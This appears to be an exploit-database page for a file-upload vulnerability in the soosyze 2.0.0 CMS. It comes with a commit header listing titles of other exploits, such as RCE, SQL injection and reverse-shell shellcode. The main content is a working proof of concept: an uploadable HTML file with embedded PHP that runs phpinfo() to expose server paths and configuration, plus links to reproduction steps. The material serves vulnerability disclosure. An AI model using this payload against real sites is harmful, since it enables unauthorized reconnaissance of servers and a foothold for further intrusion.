cbe784b087
16 changes to exploits/shellcodes/ghdb Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS Drupal 10.1.2 - web-cache-poisoning-External-service-interaction Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure soosyze 2.0.0 - File Upload SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection Wordpress Plugin Elementor 3.5.5 - Iframe Injection Wp2Fac - OS Command Injection Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) SyncBreeze 15.2.24 - 'login' Denial of Service GOM Player 2.3.90.5360 - Buffer Overflow (PoC) GOM Player 2.3.90.5360 - Remote Code Execution (RCE) Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
42 lines
No EOL
993 B
Text
42 lines
No EOL
993 B
Text
## Title: soosyze 2.0.0 - File Upload
|
|
## Author: nu11secur1ty
|
|
## Date: 04.26.2023-08.28.2023
|
|
## Vendor: https://soosyze.com/
|
|
## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
|
|
## Reference: https://portswigger.net/web-security/file-upload
|
|
|
|
## Description:
|
|
Broken file upload logic. The malicious user can upload whatever he
|
|
wants to an HTML file and when he tries to execute it he views almost
|
|
all
|
|
file paths. This could be worse than ever, it depends on the scenario.
|
|
|
|
STATUS: HIGH Vulnerability
|
|
|
|
[+]Exploit:
|
|
```HTML
|
|
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<title>Hello broken file upload logic, now I can read your special
|
|
directory pats, thank you ;)</title>
|
|
</head>
|
|
<body>
|
|
<h1>
|
|
<?php
|
|
phpinfo();
|
|
?>
|
|
</h1>
|
|
</body>
|
|
</html>
|
|
|
|
```
|
|
|
|
## Reproduce:
|
|
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)
|
|
|
|
## Proof and Exploit:
|
|
[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)
|
|
|
|
## Time spend:
|
|
01:27:00 |